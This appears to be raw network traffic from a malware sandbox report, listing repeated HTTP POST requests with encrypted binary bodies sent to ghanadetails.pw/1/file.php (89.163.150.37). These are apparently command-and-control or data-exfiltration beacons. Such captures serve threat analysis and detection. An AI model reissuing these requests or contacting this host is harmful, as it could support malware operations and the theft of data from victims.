\xc6\xce@\x06\x01(\xf9\xcd\xed\x06\xc8wX\xf6s'\x8fb\xcf\xa7\xfc\xafvp\x9e\xfd9Va(+4\xc9\xbd\x80y\x98\xa9L\x8e\xa0$@\xe7\xd5\xb8Y\xfa=jLI5y\x86WJ"\xee

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xda\xd3\x8d\xfb\x0b\xceU9\x82$\xe1\xb4\xb33\xd8\x81\x0e
ecX\x05\x88\x82\x80e\x16t\xb0\xfc(\x82d\x8f\xaa\xeb\x12\xab\x97\xb0\x99\xfb\xd5\xaf\x98\x83?\xb2\xf2\xba\xed}\xc9\xe3\xbe\xc9\xa1\xe8\x81\xd9\xe6y{\x8f\xaby\xe64\x08\x0b\xc0z\x85/\x9f\xe3\xbc@\x9f\xc5Ux\x13\xd9r1\xef\x1a5\xcc&:\x1c^\x8e+\xe9\x13:\x1f\xb2jL\xc0CZU\xcf\x88@i=\xc2E6\xe1\x89\xae\x87\x1d\x88\xfa}F\x7f\x1b\x1cJ\x83q

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xa8\xc4 \x80IB\x1e&\xa3-\x8bY\xd6\x10\x89\xf7r\x95W\x83?\xd6Q\x92E\xfcu\xbd\xeaG\x7f\x84\x10\x9e\x01\x96V!\xda\xa9\xbe\xf4\xb9D\xfb\xa6h\xc2\x88$\xd9\x9b\xa86a\xdfbw\xe4\x16\xba\xc4*\x8f\xd9nKOJ\x87\x8be\xa4&\xf5\x0e\xd9c\xce\xb3)\xe0!9\x15\xe26
\xf0UE\xf3F\xe5\xd9-\x9d\x02\x91b\xf6\xe0\x01\xd9dU9$\xebe>M\xb8\xdb\x02\x07\xe8{X\x0bKe\x18\x89#\xa6MJ\xf1f

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

v\xae'\xff:8\xaa"Y\xecZ\x0c\x92\x12\xe3\xeaG\xa6z\xc2Uv\xff\x8b\xb1=4\x04\xb1\xf0\xcf\x15Si\x9bt\xb8\xc6\xf30\xd9\xa8\xf5\x8cJ\xd7\xa2)\x1e\x12\xc9\x9c\xdb\xed\xe5\xa8\xa5\xb6\xff\xb0\xfel\x85\x01\x89\x8a\xc2\xbe\xb7s\xb1\xef\xd0i\xaa\xd5\x13\xef* \x92]\x82\xf6\xf1\xcc\x16\x9d\x8a\x1a\x8a\xc4\x93\xdc\xe72\w\x89\x02\x9a\x85\xaa\xc2\x81\x8b\xf7n\xb0xKO\x92\xf70Y\x89\xd0\xfd\x19\xa0\xbbF/s\x1d\xb2\x83\xf8\xe8W\x8b\xf9\xa8\xf9\xe8 \xceK\x97>\xc7

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x8b\xbf\xfe\x06\x1b5\xa4%F\x9f\xb0)\xe3m\xda\xa4\x1c[\x11\xc6\x93/\xa9a\x947V%\xcd\x1d\x8c;\x80Vl\xa3\xb7\xe5\xd3\x19\xe8\xf51\x87\x15\x86\xb5Ik\xc1\x8c\xb63\x9a\x9dl\xae\x92\xb3\xbf\xac\xaf\xe8\x01t\x9b\x1bG\x96~\xbf\xe8\xcf\x1a@\xf0b\x90\x13n\xc9\xa0\xe9\xf27\x95@w\xaf\x10\xe8\xe5\xef1\xa4\x1c\x8fH~\xd5\x95\xa6\x8a\xeb\xb0\xd63e\xef)\/\xe7$usa\xa7\x85\xdd\xab\x9f
 !\xde\xdf\x83\x05\xf9\x8er\xd8\xa5\xf7\xef?\xbd\xa1\xb2O\xb8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x1e\x89\x18\xd24
\xbaz\xc0[\xfc\xb8\xbeL#\x16\xba\xf1\xfd\xd5\xc7\xc5\xfc\xd7\xecU\x01\x1e\x15\x96t\x1b5@\xaaW\xb8\xfd\xedfN\x11]6h\x87l\xdb\xedK@\x85GP\xe8\xfa\xf6\xd0\xc4\xa4T\x040\x01\xe1\xad\xfd\x93\xb9F\xa1\xb7I\xde\x0ca?\xb1\xea\xdco
\x05\xe1c\x7f\x15\xc1\xd7r\xbf\xde7\xba\<:^\xb8!\x9a\xbe\xb4\x94\x162_\xd4\x92(\x85\xbda\xae\xb9@\x15m\xf0K\xf3\xdd};\xd9u\x07\x83\x90\xcfh\xa6\xf7\x9d\xe9\xb0\xb9y\xed#\x12\x99

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xfe\xc5\xd5\xf7\xf1\x02\xb1Lq/O\xaa\xeb_\xb21\xa9\xeb\x05\x9f\xc2\x95\x0fjI^3\xb9\x98\xe8\x8b\x08\xd9\x00k~q\xfe\xea\\xf3i\xe2(\x05\xc0\xe5d\xbf\x85=\xa7\x0f\xe4\x8d[\x84x\x1e\xa0z\xd9l\xb1\xb1Q\x80\x06\xcc\xf9\x1a1H\x1a\x0f\xc3\xda\x12\xcbK\xcc\xa0M\x1b\xd6\x9fV\xcc\xc2\xc9=\xc9
t\x13\x9fy\xb1\xd6\xa7\xfc\x12\x1c\x01\x04\xe5Oed\x98\xb79\xd1\x17\xe2\xa9\xb4\x99\xa7R\xf5u\xec?\xf7\xa8[3\xc03\x05,\x9a0@a\xeb\xe4\xfd\x8a\xff3\xd7\x1e\xbb

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

u\xf7hR\x07kD\xe5\x94\x8d\xdfn\x17:\xbc\x02YT\x12v\xdf\xd7,\x16x\x0cA\x80s>\x00\xdc\x86\xe6\x02\x0fSC\xcb!\xc2\x1f\xa68-q?\x83\x9b\xee\xfe\x9a\xc6rz\xf3a\xfe\xb8ME\xdb3\xb1:c=\xa3:\x90\xef\x98\xad\xb8\x9f\x07&w\xc5x<\x1fZ\xf2\xcb\xddu\xb0\xf3\x9bO\xf0\xe1\xa2\x98K&W\xbf\xd6\xde\xaf=|5\x93\x0buL)m\xde\xf5|!\x94}\x0fP\xfa\x10\xf3J\xd2\xc8\xaa\x043K\x01\xb8\x89lY\xb5\xc8\x0eFmN\x03V\xd9-K

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

+}UH\xa3\x1bU?\xa0l\xfe\xa1d\xad\xda\x81\xe6WE\xe58W!\xd4\xc7\xf1\\xc2\xacr\xfa\xad\xa9\x1dNd\x86B\xab\x8a\x87\x8f\xf6\x86/\x97(qU\x9c\xd8xP\x83\x06@\xafr\xd4~\xeb\xe6\xb8\xb1d\xe9\x00\xb9\x9e\xe0\xfeB\x99Y\xbe\xc8U\xe0\xa3\xfb\x83\x1c
a,]xrLfR\xb2>\xeeb:	\xac\xf3\xbd\x0b\xae]\xd7p\x03[\xcbN\xcfz,;\x0e\x07v\xeb\xfe,I\xde\x7f&\xe1f\x97\x8f3\x15\x8b\x85\x93\xc8)\xa4\x12:\xa7L\x81p\xc1\xbf\xae\xf4

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x02T\x18\xe5\x08y\xe6 P5\xf5\xe7n\xb4\x98\xaaCP\xc9Q:\x16l"\xa5(\xe4\xc7\xaaW\x16gV\xe2\xd5\x1f\xfb\xf6\xceC\xa1\x00+\x16>v\xecf\x0b|VHE\xc6lE\xd6\xa2.\x8a\x1c2\xa5\x8av\xfbv/\x0e\xb9vfR;\x8e\xb5d\xc2\xda\xeb\x1d \xba\xee\x15'\x0e\xbf\x15\x84\xd1\x8c\x03\xf0\xb5\xcb\xd1tO\xe1Q=\x1f9q\xab\xa1|\xb5'\xc9\xf6o\xf8z3\x1cJ\x94JMWo\x15\x91C\x92\x08\x07\x99\xfd\x1bKorn\xaf\x9ax\xf9N

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

N\xad\x87\x16!\xc7\xa4\xf4\xa6h\x88\xf1\x1c\x05\x1c\x0f\xdc\xc8\x1c\xb9\xf6\xab\xd6\xaa$~\xc7\xde	\x0b\xca\x07z{*\x8c\xb2(\xec\xf77=6`,\xa7\x08\xa3\xf4\x84\xe3\xc0\xe9\x1b\xb6\xad7\x94m\xf3\xdf\x0e\x19\x8a:\x02\xe9\xdc'\x074\xb2\xa4f\xf3\xa3\x16s^N\x82\xb8o\x06\xd9\x9a\xb47\x94\xd2\xf2\x95\xa0\xaci\xab\xfd\xed\xb0r\x18\xe3=\x8d\xe7\x96\xbc
\xa7\xf6-3\x90\x00\xcf\xbb\xb0\x97N\xa2\xaca,lR\x7f.\x08K`b\xe8b\xd10\xbaY\xc7\x05\xef<